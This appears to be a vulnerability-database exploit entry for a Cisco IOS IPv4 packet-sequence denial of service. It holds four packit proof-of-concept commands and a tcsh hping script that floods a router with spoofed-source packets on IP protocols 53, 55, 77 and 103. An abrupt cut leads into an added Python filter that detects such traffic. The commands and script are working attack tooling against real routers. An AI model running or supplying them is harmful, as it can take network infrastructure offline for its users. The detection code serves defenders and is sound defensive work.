Cisco IOS Malicious IPV4 Packet Sequence Denial Of Service Vulnerability
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

This issue can be exploited with utilities such as hping, so specific exploit code is not required to exploit this issue.

The following proof-of-concept has been provided to reproduce the vulnerability using packit 0.6.0d and later:

packit -t RAWIP -V 53 -d dst_ip -T ttl
packit -t RAWIP -V 55 -d dst_ip -T ttl
packit -t RAWIP -V 77 -d dst_ip -T ttl
packit -t RAWIP -V 103 -d dst_ip -T ttl

The following shell script has been made available by Pat Donahue:

---
#!/bin/tcsh -f
if ($1 == "" || $2 == "") then
  echo "usage: $0 <router hostname|address> <ttl>"
  exit
endif
foreach protocol (53 55 77 103)
  /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 19 --interval u250 --data 26
end
---

Additional exploits have been made available by Michal Zalewski and Martin Kluge. The following exploit is available:
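For defenders, the traffic produced by the commands above is recognisable by its IP protocol field. The following is an added detection example, not part of the original entry and not one of the exploits it refers to: a Python filter that flags IPv4 packets addressed to a router interface and carrying one of the four protocol numbers used above (53, 55, 77, 103). The function names, the router address 192.0.2.1 and the sample headers are constructed for illustration.

```python
import ipaddress

# IP protocol numbers passed to packit/hping in the commands on this page.
SUSPECT_PROTOCOLS = {53, 55, 77, 103}

# Constructed sample IPv4 headers (hex, checksum zeroed); not captured traffic.
SAMPLE_PACKETS = [bytes.fromhex(h) for h in (
    "450000140000000001350000c6336407c0000201",  # proto 53 -> router
    "450000140000000040060000c6336407c0000201",  # TCP -> router (normal)
    "450000140000000001670000c6336407c0000263",  # proto 103 -> other host
    "4500001400000000014d0000c6336407c0000201",  # proto 77 -> router
    "4500",                                      # truncated, must be skipped
)]


def parse_ipv4_header(packet):
    """Return (protocol, ttl, src, dst), or None for a malformed header."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    header_len = (packet[0] & 0x0F) * 4
    if header_len < 20 or len(packet) < header_len:
        return None
    src = ipaddress.IPv4Address(packet[12:16])
    dst = ipaddress.IPv4Address(packet[16:20])
    return packet[9], packet[8], src, dst


def flag_suspect(packets, router_addrs):
    """List (index, protocol, ttl, source) for suspect packets sent to a router."""
    routers = {ipaddress.IPv4Address(a) for a in router_addrs}
    hits = []
    for index, packet in enumerate(packets):
        header = parse_ipv4_header(packet)
        if header is None:
            continue
        protocol, ttl, src, dst = header
        if dst in routers and protocol in SUSPECT_PROTOCOLS:
            hits.append((index, protocol, ttl, str(src)))
    return hits


if __name__ == "__main__":
    # 192.0.2.1 is a documentation address standing in for a router interface.
    for hit in flag_suspect(SAMPLE_PACKETS, ["192.0.2.1"]):
        print("packet %d: protocol %d ttl %d from %s" % hit)
```

Because the script above uses --rand-source, the source address reported for a flagged packet is not reliable for attribution.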